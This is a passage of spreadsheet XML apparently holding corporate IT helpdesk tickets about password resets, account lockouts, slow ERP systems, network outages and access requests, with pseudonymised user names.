1.    please add new csr wkgpcxqd vobarhzk (wkgpcxqd.vobarhzk@gmail.com&lt;mailto:wkgpcxqd.vobarhzk@gmail.com&gt; ) to following distribution lists:
distributors.service@company.com&lt;mailto:distributors.service@company.com&gt; (email bucket 3 company csr in poland are shatryung)
company-sales-team company-sales-team@company.com&lt;mailto:company-sales-team@company.com&gt;
company-promotion-emea company-promotion-emea@company.com&lt;mailto:company-promotion-emea@company.com&gt;
2.    to add esguiazn pqdjtzin (malgorzata.gugala@company.com&lt;mailto:malgorzata.gugala@company.com&gt;) to
bucket email@wpgmkt.com&lt;mailto:email@wpgmkt.com&gt;   &amp; company-promotion-emea@company.com&lt;mailto:company-promotion-emea@company.com&gt;
3.    xhnmygfp bnpehyku (joanna.pollaurid@company.com&lt;mailto:joanna.pollaurid@company.com&gt; ) to
company-promotion-emea company-promotion-emea@company.com&lt;mailto:company-promotion-emea@company.com&gt;
best </t>
  </si>
  <si>
    <t>see attachment</t>
  </si>
  <si>
    <t>see attachment
contact :  (uk)</t>
  </si>
  <si>
    <t>xcufgmhj yezfxmga</t>
  </si>
  <si>
    <t>when i call the germany office with telephony_software the can't hear me.</t>
  </si>
  <si>
    <t>when i call the germany office with telephony_software the can't hear me but i can hear them. this happended twice today (last interaction id 2175600354) but also some weeks ago._x000D_
i have no problems when i call other people inside and outside the company.</t>
  </si>
  <si>
    <t>pxvzohlu hwyijpgd</t>
  </si>
  <si>
    <t>blocked inwarehouse_tool for 5205 9048054513</t>
  </si>
  <si>
    <t>blocked inwarehouse_tool in our system. reason for blocking "document 0159165624 has been saved (foreign trade data incomplete) ". (same as ticket_no1551982). _x000D_
after first analysis, infos were available in mm 03 for  concerned materials. we know how to fix the issue, but before completing the document, please provide information or make further analysis in order to avoid this issue in the futur.</t>
  </si>
  <si>
    <t>ahmgtlyf ofgxcrys</t>
  </si>
  <si>
    <t>videos won't play in skirtylport training</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vkzwafuh.tcjnuswg@gmail.com
hi,
i am trying to take a training course and when i start the course the videos won't play. please advise.
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
</t>
  </si>
  <si>
    <t>bitte konto erzeugen. ewew7212768</t>
  </si>
  <si>
    <t>optiplex 5040 
messmachine 
berirtch : zedghkler</t>
  </si>
  <si>
    <t xml:space="preserve">unable to access SID_1 </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rxoynvgi.ntgdsehl@gmail.com_x000D_
_x000D_
hi it team_x000D_
_x000D_
kindly please assist as i unable to access SID_1 in my system._x000D_
_x000D_
attached for your reference. </t>
  </si>
  <si>
    <t>reset the password for bwgldaoe aczyfqjr on erp / qa / erp</t>
  </si>
  <si>
    <t xml:space="preserve">please reset my password in erp SID_1 erp uacyltoe hxgaycze system.. </t>
  </si>
  <si>
    <t xml:space="preserve">not able to login to beyond evolution campaign reporting_engineering_tool </t>
  </si>
  <si>
    <t>not able to login to beyond evolution campaign reporting_engineering_tool - #/site/certified_content</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lvxakohq.tsfnhowj@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
i am not able to log on to business_client soft ware in my laptop._x000D_
_x000D_
pl do needful on priority._x000D_
_x000D_
_x000D_
_x000D_
with kind </t>
  </si>
  <si>
    <t>erp hrp hcm account lockout</t>
  </si>
  <si>
    <t>probleme mit erpgui \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t xml:space="preserve"> pc empw 8144239 neu aufsetzen</t>
  </si>
  <si>
    <t>pc empw 8144239 neu aufsetzen</t>
  </si>
  <si>
    <t>wyotidgu nydzrtuw</t>
  </si>
  <si>
    <t>not able to create dc</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgtarthi.erjgypa@company.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
we are unable to create delivery challan due to below error._x000D_
_x000D_
[cid:image004.png@01SID_354e4.45837db0]_x000D_
_x000D_
[cid:image001.png@01SID_354e2.2aad98b0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/22/2016 05:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/22/2016 05:24:00</t>
  </si>
  <si>
    <t>id04 printer not working at company</t>
  </si>
  <si>
    <t>konto gesperrt \ handy wlan authentifizierungsproblem</t>
  </si>
  <si>
    <t>jxphgfmb gjbtuwek</t>
  </si>
  <si>
    <t>access point defekt .\jxphgfmb gjbtuwek</t>
  </si>
  <si>
    <t>probleme mit outlook \kwehgxts agdsqbwv</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,_x000D_
_x000D_
ich mÃ¶chte gerne das in der suche auch meine telefon-nr. erscheint_x000D_
</t>
  </si>
  <si>
    <t>kwehgxts agdsqbwv</t>
  </si>
  <si>
    <t>probleme mit skype \difozlav dgbfptos \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>1098572 stock issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rgtoger.lfgtiu@company.com
hello it
there is 1pcs 2109683 under plant_283, but i can't run the dn for 7329411, please help check it, </t>
  </si>
  <si>
    <t>bejcxvis anxmhwis</t>
  </si>
  <si>
    <t>dvd palyer not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gwmspqeo.vwfetaqg@gmail.com_x000D_
_x000D_
dear sir,_x000D_
                the dvd player not working in my pc. kindly rectify._x000D_
_x000D_
contact number: 0731105554/ #10196_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>login problems in skype.</t>
  </si>
  <si>
    <t>xnkqufwl hjnvudlk</t>
  </si>
  <si>
    <t xml:space="preserve">please check pgi from delivery note 9169359948 </t>
  </si>
  <si>
    <t>please check pgi from delivery note 8058248837</t>
  </si>
  <si>
    <t>your account</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
i'm unable to login on the bcd travel side as the creation of a password failed. see below_x000D_
_x000D_
gruÃŸ </t>
  </si>
  <si>
    <t>anuxbyzg bvsqcjkw</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_512 failed in job_scheduler at: 09/22/2016 03:57:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_512 failed in job_scheduler at: 09/22/2016 03:57:00</t>
  </si>
  <si>
    <t>poland experience some response time slowness again</t>
  </si>
  <si>
    <t>usa - (company inc.):gigabitethernet2/0/49 -interface is down since at 3:13 am et on 09/22.</t>
  </si>
  <si>
    <t>usa - (company inc.): interface: gigabitethernet2/0/49 Â· uplink to company-na-usa-usa-conforma-3750-core-sw01 - on   company-na-usa-usa-conforma-bld-1-3750-stack-sw01since at 3:13 am et on 09/22.</t>
  </si>
  <si>
    <t>erp - SID_34 - long response time + long runtime</t>
  </si>
  <si>
    <t xml:space="preserve">several users in fÃ¼rth including me are experiencing a drop in performance since some hours._x000D_
opening transactions, executing transactions and extracting data out of erp takes significantly longer than usually._x000D_
can you please check._x000D_
</t>
  </si>
  <si>
    <t>cfajzero vlygoksi</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xaertwdh.kcsagvpy@gmail.com_x000D_
_x000D_
hi_x000D_
please advise? my collaboration_platform is not saving or syncing any files. the notice i get says: sync problems. </t>
  </si>
  <si>
    <t>cpsybwla snymigat</t>
  </si>
  <si>
    <t>EU_tool problem  - urgent-</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xnlapdeq.wupaeqlv@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i have a problem with EU_tool, i can not get the transfer times of our employees._x000D_
the downloaded file is empty. without this datas, it is not possible to calculate the "productivity" of our plants in germany._x000D_
_x000D_
[cid:image002.png@01SID_354ae.6ad42a00]_x000D_
_x000D_
[cid:image003.png@01SID_354ae.6ad42a00]_x000D_
_x000D_
mit freundlichen grÃ¼ssen / with kind </t>
  </si>
  <si>
    <t>hello can you please do the daily reset of my vpn password. my account is vanghtydec. every second time i log in the password is blocked. 
can please solve this problem on a structural basis?
contact : 
user : vanghtydec</t>
  </si>
  <si>
    <t>afplnyxb eiomnuba</t>
  </si>
  <si>
    <t>please provide permission to the files in m:\it department\networking</t>
  </si>
  <si>
    <t xml:space="preserve">mikrofon vom mobiltelefon gigaset sl 3 defekt! </t>
  </si>
  <si>
    <t>bitte telefon tauschen.</t>
  </si>
  <si>
    <t>qbsgwujo gvbzkjfq</t>
  </si>
  <si>
    <t>ship-to creation error</t>
  </si>
  <si>
    <t xml:space="preserve">since we have many users that have multiple sold-tos assigned to their profile (eg. mfg_tooltors, distributors), there is an issue when they add new ship-to._x000D_
1. create new ship-to related to the current selected sold-to ( works fine )_x000D_
2. change the sold-to and create the exact same ship-to ( system error: ship-to already exists )_x000D_
that is a problem, as user cannot create the same recipient address for multiple different sold-tos. the duplication check should only be done against the existing ship-tos of the currently selected sold-to._x000D_
</t>
  </si>
  <si>
    <t>full access to oe drive fÃ¼rth</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: scjxobhd.ldypjkmf@gmail.com_x000D_
_x000D_
hello help team ,_x000D_
_x000D_
can you pls. arrange full access for oscar usero and ivbkzcma nrehuqpa to the following oe drive on teams\\eagcldaten:_x000D_
_x000D_
_x000D_
\\eagcldaten\teams\oe-12_kata&lt;file://eagcldaten/teams/oe-12_kata&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>please help to logon erp system</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rtjwbuev.gfpwdetq@gmail.com_x000D_
_x000D_
hello_x000D_
_x000D_
i am unable to logon erp system now. so please help me to check it. many </t>
  </si>
  <si>
    <t>rtjwbuev gfpwdetq</t>
  </si>
  <si>
    <t>power outage: engineering_toolkuznetsk warehouse - (company):interface vlan1 is down since at 1:13 am et on 09/22.</t>
  </si>
  <si>
    <t>engineering_toolkuznetsk warehouse - (company):vlan1 interface is down since at 1:13 am et on 09/22.</t>
  </si>
  <si>
    <t xml:space="preserve">awb 0276036761 / sin - jnb </t>
  </si>
  <si>
    <t xml:space="preserve">hi johthryugftyson
any update form it team as i want to close this issue.
</t>
  </si>
  <si>
    <t>bitte erstellen sie mir eine liste Ã¼ber alle berechtigungen bzw zugriffe von cvltebaj yzmcfxah (rostuhhwr)</t>
  </si>
  <si>
    <t>ukvlnrwb fiyeczmh</t>
  </si>
  <si>
    <t xml:space="preserve">unable to create new or any exepnse report - info type '0017' error </t>
  </si>
  <si>
    <t>user is a new employee and unable to create expense report and getting error as mentioned in screenshot, please find the attachment</t>
  </si>
  <si>
    <t>vfrdxtqw jfbmsenz</t>
  </si>
  <si>
    <t>i  can not log  in  erp</t>
  </si>
  <si>
    <t>password logon no longer possible - too many failed attempts</t>
  </si>
  <si>
    <t>qdbfemro mcsqzlvd</t>
  </si>
  <si>
    <t xml:space="preserve">usa access for configuring outlook exchange on windows phone </t>
  </si>
  <si>
    <t>reset passwords for qdbfemro mcsqzlvd using password_management_tool password reset.</t>
  </si>
  <si>
    <t>i can not log in erp</t>
  </si>
  <si>
    <t>plm response is very slow</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hctduems.znalhivf@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
good day!_x000D_
_x000D_
from morning it's been observed like plm response is very slow._x000D_
_x000D_
kindly take the action against it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>hctduems znalhivf</t>
  </si>
  <si>
    <t>users are complaining that erp response is very slow &amp; getting disconnected frequently.</t>
  </si>
  <si>
    <t>given name and sur name changes required in windows domin</t>
  </si>
  <si>
    <t xml:space="preserve">given name and surname changes required in windows domain. please change it to _x000D_
hnkwirgv wdgebvpzagavan_x000D_
</t>
  </si>
  <si>
    <t>erp slow response</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kugwsrjz.xnygwtle@gmail.com
erp has been very slow and takes more than 30 seconds to execute a transaction
gurhyqsath j
india
kugwsrjz.xnygwtle@gmail.com&lt;mailto:kugwsrjz.xnygwtle@gmail.com&gt;
</t>
  </si>
  <si>
    <t>isuclrnw hxrtkiws</t>
  </si>
  <si>
    <t>apac company:fastethernet0/48 - company-ap-chn-apac-shop-closet-2960-access-sw01 is down since at 20:03 et on 09/21</t>
  </si>
  <si>
    <t>apac company:  company-ap-chn-apac-shop-closet-2960-access-sw01.company.com  -    fastethernet0/48 Â· uplink to company-ap-chn-apac-2950-24-access-sw05 since at 20:03 et on 09/21</t>
  </si>
  <si>
    <t>security_tool notification: password verification failure for monitoring_tool azure server clhqsm029</t>
  </si>
  <si>
    <t xml:space="preserve">from: ugyothfz ugrmkdhx 
sent: thursday, september 22, 2016 8:37 am
to: ntteam &lt;ntteam@company.com&gt;; stefyty dabhruji &lt;slzhuipc.sqntcber@gmail.com&gt;; xomkhzrq vytqlphd &lt;boxrlpec.fnkhwytl@gmail.com&gt;; datacenter &lt;datacenter@company.com&gt;
cc: bhayhtrathramdnty mamilujli &lt;bhayhtrathramdnty mamilujli@company.com&gt;; gzhapcld fdigznbk &lt;rubiargty.fatgrtyma@company.com&gt;; hnynhsth jsuyhwssad &lt;bxspwfyo.vzystwor@gmail.com&gt;; kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&gt;
subject: clhqsm029 : notification: password verification failure
hello windows server support, nvyjtmca xjhpznds operations,
we have received a password verification failure in security_tool when attempting to connect to the monitoring_tool azure server clhqsm029. it looks like this server exits in the company domain, but we are unable to connect to this server.
please find the log details in the alert below and confirm if the server is still active or decommissioned. </t>
  </si>
  <si>
    <t>apac- china and apac plant have reported erp slowness</t>
  </si>
  <si>
    <t>obuwfnkm ufpwmybi</t>
  </si>
  <si>
    <t>acct 70939408</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nkthumgf.mwgdenbs@gmail.com
this account was extended to div. 02 in crm on tuesday but the new extension has not replicated to SID_34 yet.  please advise.
nkthumgf mwgdenbs
nkthumgf.mwgdenbs@gmail.com&lt;mailto:nkthumgf.mwgdenbs@gmail.com&gt;
ph: 
</t>
  </si>
  <si>
    <t>outlook isue : user called back.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vxzahrlc.frtkpehy@gmail.com_x000D_
_x000D_
i keep having to restart outlook and my computer._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>dell 7350: sound issue.</t>
  </si>
  <si>
    <t>dell 7350: sound issue._x000D_
-connected to the user system using teamviewer._x000D_
-installed the sound drivers._x000D_
-restarted the pc.sound is working fine now._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_47filesys failed in job_scheduler at: 09/21/2016 17:49:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_47filesys failed in job_scheduler at: 09/21/2016 17:49:00</t>
  </si>
  <si>
    <t>my account (user = morhyerw) is being repeatedly locked.  please run a trace to determine the cause.</t>
  </si>
  <si>
    <t>for the past two days, my account has been repeatedly locked.  i have not been entering the wrong password thrgxqsuojr xwbesorfs in a row on my pc (10.170.3.189).  keyhtyvin toriaytun has unlocked it several times.  keyhtyvin has asked me to request a trace to determine what is causing my account to be locked.</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not launching.
-connected to the user system using teamviewer.
-uninstalled and reinstalled mscrm.
-restarted the pc.
-caller confirmed that he is now able to see the emails on outlook.
-issue resolved.
</t>
  </si>
  <si>
    <t>huaxlyfi lqvamnbj</t>
  </si>
  <si>
    <t>workflow</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nealxjbc.owjduxai@gmail.com
i used to be the supervisor over usa.  in july this was changed to efqhmwpj tgeynlvr being the supervisor over that location.  credit memo's and returns are still coming to my workflow and i have to forward to them.  today i was informed that nuhfwplj ojcwxser is now the team lead over usa/ usa/usa and these should be sent to her.  can you update erp so these get routed properly?
nealxjbc owjduxai
customer service supervisor
nealxjbc.owjduxai@gmail.com&lt;mailto:nealxjbc.owjduxai@gmail.com&gt;
</t>
  </si>
  <si>
    <t>login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad and unlocked the account._x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>not able to login to vpn,_x000D_
-advised the caller to restart the system and check the internet connection._x000D_
updated the drivers._x000D_
-advised the caller to logon to the company vpn._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>zidbmyut esmbcxor</t>
  </si>
  <si>
    <t>network problems (multiple applications are running slow)</t>
  </si>
  <si>
    <t>how did you determine there are network problems ? error: web page not recovering in mii_x000D_
_x000D_
is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow) erp mii_x000D_
_x000D_
are more than one transactions impacted? operator dashbankrd_x000D_
_x000D_
what erp server are you on (server name is located in the status bar at the bottom _x000D_
right of your screen) ? SID_34_x000D_
_x000D_
do other co-workers also notice slow response times in erp ? yes. it happened on multiple machines_x000D_
_x000D_
what other applications are running slow ? mii is the only application available to operators_x000D_
_x000D_
can you access your data files on the server ?_x000D_
_x000D_
any other comments or issues with other systems ? this slow response happens during shift change when a lot of activity on the system. 645-715 and 245-315</t>
  </si>
  <si>
    <t>vip 1: please add me to the allowed sender list for the usx team members.</t>
  </si>
  <si>
    <t>please add me to the allowed sender list for the usx team members.</t>
  </si>
  <si>
    <t>hkrecpfv kgwpbexv</t>
  </si>
  <si>
    <t>name:mikhghytr
language:
browser:microsoft internet explorer
email:vcyktjxp.uxdojvrq@gmail.com
customer number:
telephone:
summary:i cant load the company home page or engineering_tool</t>
  </si>
  <si>
    <t>vcyktjxp uxdojvrq</t>
  </si>
  <si>
    <t>cawuojrb trwsilgq</t>
  </si>
  <si>
    <t>unable to update passwords on all accounts</t>
  </si>
  <si>
    <t>nesmdkpr dcaqoxsy</t>
  </si>
  <si>
    <t>cannot print to prtqx1248 on pc rqxw8514035 anymore, prints stall in print queue.</t>
  </si>
  <si>
    <t>mfrsgwnk wremyjlo</t>
  </si>
  <si>
    <t>request to remove 1 day pick route logic from supply_chain for customers 81163582 &amp; 81183209 in plant_101 view.</t>
  </si>
  <si>
    <t>name:xnqzhtwu hivumtfz
language:
browser:microsoft internet explorer
email:xnqzhtwu.hivumtfz@gmail.com
customer number:
telephone:
summary:request to remove 1 day pick route logic from supply_chain for customer 81163582 in plant_101 view.</t>
  </si>
  <si>
    <t>computer crashed after a reboot</t>
  </si>
  <si>
    <t>unable to connect to outlook</t>
  </si>
  <si>
    <t>name:mikhghytr
language:
browser:microsoft internet explorer
email:vcyktjxp.uxdojvrq@gmail.com
customer number:
telephone:
summary:i cant connect to outlook</t>
  </si>
  <si>
    <t>ticket update inplant_862604</t>
  </si>
  <si>
    <t>email search option issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xyculgav.cuqptoah@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to search emails using from or subject option as only few of the cases come._x000D_
hence it is becoming very difficult to retrieve past details which is required for many reference ._x000D_
_x000D_
plus the address book details are also not sync automatically ._x000D_
_x000D_
pl help in fixing the same._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>r: ticket_no1402627 change in report zsdslsum -  last email</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xawlkiey.demjqrfl@gmail.com_x000D_
_x000D_
pethrywr, lauthry_x000D_
sorry but i'm still waiting your confirmation that this was agreed globally within finance team (am, emea, apac) in order to move on ._x000D_
this is not an otc report, it's only used by your finance team._x000D_
_x000D_
if i'm not receiving a confirmation, i'm sorry but i have to cancel the ticket. i'll will wait till oct.15, 2016 then i have to cancel._x000D_
_x000D_
hope you comprehend._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>GRP_64</t>
  </si>
  <si>
    <t>account expired for user coumikzb ubfcwegt</t>
  </si>
  <si>
    <t>account expired for user coumikzb ubfcwegt
user id -viruhytph</t>
  </si>
  <si>
    <t>company emails on personal smartphone</t>
  </si>
  <si>
    <t>pjnlxcrm kizumjot</t>
  </si>
  <si>
    <t xml:space="preserve">usa:interface down on tengigabitethernet1/5 tech-4500x (a)-(10.1.200.2) since at 10:28 am et on 09/21. </t>
  </si>
  <si>
    <t>interface down - on   tengigabitethernet1/5 Â· connection to tech-4500x (a) - (10.1.200.2) ._x000D_
interface down - on   tengigabitethernet1/1/1 Â· dr l3 connection to 6500 top (10.1.200.1)</t>
  </si>
  <si>
    <t>dell 7350:sound issue with skype calls.</t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350:sound issue with skype calls.
-connected to the user system using teamviewer.
-upgraded the system bios.
-restarted the pc.checked the skype audio settings.
-gave a uacyltoe hxgaycze call to the user through skype.
-audio is now working fine.
contact : </t>
  </si>
  <si>
    <t>berechtigung fÃ¼r ordner einrichten</t>
  </si>
  <si>
    <t xml:space="preserve">ich benÃ¶tige fÃ¼r folgende personen aus germany die angegeben berechtigung fÃ¼r den ordner: \\HostName_705\teams\schlammversand-sludgeshipping.
nur leseberechtigung:
b. hoscgthke / pl metallurgie
th. langhdte / pl schneidkÃ¶rper
g. hbyoyer / pl stÃ¤befertigung
b. dahytrda / sv distribution
d. retzkowski / controlling
b. chsbhuo / controlling
</t>
  </si>
  <si>
    <t>xtfniscy ecoyksda</t>
  </si>
  <si>
    <t>requesting un-install and re-install of excel 2013</t>
  </si>
  <si>
    <t xml:space="preserve">i am currently running into issues with my "context menu" which is displayed when i right click in an excel document. the menu does not pop-up in any of my excel documents, and i frequently use it to format cells when working in files. please assist, </t>
  </si>
  <si>
    <t>ticket update on inplant_862569</t>
  </si>
  <si>
    <t>unable to connect projector</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aljbtwsh.lepkbgix@gmail.com_x000D_
_x000D_
dear sir/ ma'am,_x000D_
_x000D_
i am unable to connect the projector on my system._x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>khsilgon tpyeucvl</t>
  </si>
  <si>
    <t>mii password reset</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1387 failed in job_scheduler at: 09/21/2016 11:17:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1387 failed in job_scheduler at: 09/21/2016 11:17:00</t>
  </si>
  <si>
    <t>erp access issue - SID_1</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1
enter user id of user having the issue: nehsytwrrej
transaction code(s) the user needs or was working with: grwtfer
describe the issue:
see attachment
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
attached
provide access the same as this other user:</t>
  </si>
  <si>
    <t>slubnjry qcrabvoe</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: damuphws.arkulcoi@gmail.com
good morning:
   yes, we use z_chk in usa as well.
have a good day..
damuphws arkulcoi
shipping/inventory specialist
company, inc.
damuphws.arkulcoi@gmail.com
from: smxoklny hbecskgl
sent: wednesday, september 21, 2016 10:04 am
to: chnagdrtymk an; damuphws arkulcoi; company@ticketing_tool.com
cc: eples
subject: re: need a little help--please
chahdtyru,
            i have confirmed that usa is using z_chk to process.
best </t>
  </si>
  <si>
    <t>ç­”å¤: ç­”å¤: order products online problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fkdazsmi.yecbrofv@gmail.com_x000D_
_x000D_
hello,_x000D_
i will ask your help if i can't solve it with the help of my boss tomorrow. </t>
  </si>
  <si>
    <t>fkdazsmi yecbrofv</t>
  </si>
  <si>
    <t>blank call // gso loud noise</t>
  </si>
  <si>
    <t>erp SID_1 account locked out</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: smxoklny.hbecskgl@gmail.com
chandruhdty,
            i have confirmed that usa is using z_chk to process.
best </t>
  </si>
  <si>
    <t>ticket update on ticket_no0442388</t>
  </si>
  <si>
    <t>need to check if sdlixwmb zvygmnco's account is locked</t>
  </si>
  <si>
    <t>hwbipgfq.sqiyfdax@gmail.com called to check how to change the lanhuage of office</t>
  </si>
  <si>
    <t xml:space="preserve">unable to update passwords </t>
  </si>
  <si>
    <t>hawrkqnp sjwrgakp</t>
  </si>
  <si>
    <t>vip2: erp SID_34 account unlock</t>
  </si>
  <si>
    <t>usqrpicf dfmxaliz</t>
  </si>
  <si>
    <t>crm configuration and password reset</t>
  </si>
  <si>
    <t>general enquiry about engineering_tool installation on windows xp</t>
  </si>
  <si>
    <t>network outage :canada, ontario - (company):site is hard down since at 10:01 am et on 09/21.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______10:01 am et on 09/21________________x000D_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</si>
  <si>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please activate my new company owned samsung s7 galaxy for office 365 access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nwfoucba.dzbujamc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please activate my new company owned samsung s7 galaxy for office 365 access:_x000D_
_x000D_
gerÃ¤temodell:_x000D_
_x000D_
sm-g930f_x000D_
_x000D_
gerÃ¤tetyp:_x000D_
_x000D_
samsungsmg930f_x000D_
_x000D_
gerÃ¤te-id:_x000D_
_x000D_
sec1e1f38f42937a_x000D_
_x000D_
gerÃ¤tebetriebssystem:_x000D_
_x000D_
android 6...1_x000D_
_x000D_
gerÃ¤tebenutzer-agent:_x000D_
_x000D_
android-samsung-sm-g930f/101.60001_x000D_
_x000D_
gerÃ¤te-imei:_x000D_
_x000D_
353555080301662_x000D_
_x000D_
exchange activesync-version:_x000D_
_x000D_
14.1_x000D_
_x000D_
gerÃ¤tezugriffsstatus:_x000D_
_x000D_
quarantined_x000D_
_x000D_
grund fÃ¼r gerÃ¤tezugriffsstatus:_x000D_
_x000D_
global_x000D_
_x000D_
_x000D_
you can remove the existing samsung galaxy s5 device from my account, but do not remove any other devices that have access to my account._x000D_
</t>
  </si>
  <si>
    <t>nwfoucba dzbujamc</t>
  </si>
  <si>
    <t>.companyfoundation@kcompany.com and .relations@company.com but doesn't work</t>
  </si>
  <si>
    <t>need to add two mailboxes to outlook (still working with outlook 2010) .companyfoundation@kcompany.com and .relations@company.com but doesn't work</t>
  </si>
  <si>
    <t>fmjeaoih ndyezlkb</t>
  </si>
  <si>
    <t>drucker wk20 defekt</t>
  </si>
  <si>
    <t>xgejlvkn msbunvpx</t>
  </si>
  <si>
    <t>password reset as it is expired</t>
  </si>
  <si>
    <t>zylwdbig wdkbztjp</t>
  </si>
  <si>
    <t>modify teamsales sproc to calculate full ytd instead of delta</t>
  </si>
  <si>
    <t>the current team sproc calculates a delta value and adds it in to the previous period ytd sales to get the full ytd sales. this needs to be changed. instead of calculating a delta, the procedure will calculate a true ytd number by applying current allocations percentages retroactively and by summing all direct revenue and adjustments together.</t>
  </si>
  <si>
    <t>infopath links to discount forms do not open</t>
  </si>
  <si>
    <t>hello,_x000D_
discount team in poznaÅ„ is unable to open discount request forms from links in our inboxes - error occurs - this hugely impacts the team's productivity - please address as soon as possible. attached are two print screens - one with an example of said links, one with the error that occurs when trying to open a discount form.</t>
  </si>
  <si>
    <t>ahydmrbu fjymgtvo</t>
  </si>
  <si>
    <t>unable to load erp</t>
  </si>
  <si>
    <t>recall: ticket_no1551667 - due date has been updated to 09-30-2016 09:16:47 edt</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: riqmdnzs.mtlghwex@gmail.com_x000D_
_x000D_
riqmdnzs mtlghwex would like to recall the message, "ticket_no1551667 - due date has been updated to 09-30-2016 09:16:47 edt"._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>riqmdnzs mtlghwex</t>
  </si>
  <si>
    <t>connect 2 in 1 to companysecure</t>
  </si>
  <si>
    <t>unable to get on network drives</t>
  </si>
  <si>
    <t>jrxsdcna iyhktobe</t>
  </si>
  <si>
    <t>wsomjgqe osyicmxw</t>
  </si>
  <si>
    <t>znyijvpg kjqhrwlv</t>
  </si>
  <si>
    <t>i cannot provide data into crm</t>
  </si>
  <si>
    <t xml:space="preserve">i can't provide information in crm - during working on it , website is stopping my job and showing that kind of alert which i have attached. it's happening from yesterday to today every second or every time when i am starting fill data.  this has worked before just started happening_x000D_
</t>
  </si>
  <si>
    <t>lmsxcvoz vzhkdpfn</t>
  </si>
  <si>
    <t>due to new hardware usa access to exchange account.</t>
  </si>
  <si>
    <t>die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird.</t>
  </si>
  <si>
    <t>wjbanovh mohgutiw</t>
  </si>
  <si>
    <t>erro programdntya docad</t>
  </si>
  <si>
    <t xml:space="preserve">please, this problem is related it south_amerirtca._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>loop back ip for primary router at erkheim went unreachable</t>
  </si>
  <si>
    <t>account lock out.</t>
  </si>
  <si>
    <t>pmgzhivt shexujmb</t>
  </si>
  <si>
    <t>cannot open new lean tracker form</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: saerpwno.qsdfmakc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
greetings for the day..!_x000D_
_x000D_
please help me to open the fy17 "add a lean event" form. when i tried to open it i got the following message it said me to update my infopath with newer version._x000D_
_x000D_
